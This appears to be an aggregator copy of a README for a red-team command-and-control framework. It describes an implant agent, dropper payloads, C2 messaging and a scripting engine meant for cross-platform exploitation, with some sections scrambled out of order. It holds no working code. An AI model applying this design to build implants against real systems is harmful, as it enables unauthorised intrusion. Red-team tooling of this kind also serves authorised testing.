entGraph models and schemas used by the teamserver (see Facebook's entgo tool for more info).
pkgPublic facing libraries utilized by repository tools but also exposed to the world.
pkg/agentAn abstraction to easily create an implant or communication transport.
pkg/c2C2 service related helpers and standardized message definitions.
pkg/c2/protoProtobuf spec to define a standardized serialization format for Agent <-> C2 communication.
pkg/dropProvides a simple method used by compiled dropper payloads.
pkg/middlewareCommon middleware for HTTP services.
pkg/scriptPython-like scripting language for dynamic configuration, automation, and cross-platform exploitation.
pkg/script/stdlibStandard libraries that expose functionality for scripting execution environments.
pkg/teamserverTeamserver service related helpers.
wwwContains the primary web application hosted by the teamserver. Created by Facebook's create-react-app application.
www/src/componentsReuseable react-components.
www/src/configWeb App configuration & routing.
www/src/viewsContainers that query data from the Teamserver and compose components to render.

Teamserver Reference

Knowledge Graph

Below is an overview of the relationship between nodes in the Red Team knowledge graph managed by the Teamserver.



Agent Reference

transport priority. To use your own, simply implement the agent.Sender interface and register your transport during initialization. Examples of existing transports can be found in subdirectories of the agent package.


Task Execution

By default, the agent expects tasks to adhere to starlark syntax, and exposes a standard library for scripts to utilize. To change the behaviour of task execution (i.e. just bash commands), you may implement the agent.Receiver interface to execute tasks as you'd like.


Scripting Environment

The scripting environment can be customized for your agent, enabling you to easily package new functionality for scripts to utilize. See script options to learn how to extend the agent's script engine.


Execution Flow

Below is a flow diagram of the general execution of the agent implant.


Adding a Transport

The agent is designed to be easily customized with new transport mechanisms, multiplexing communications based on




Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>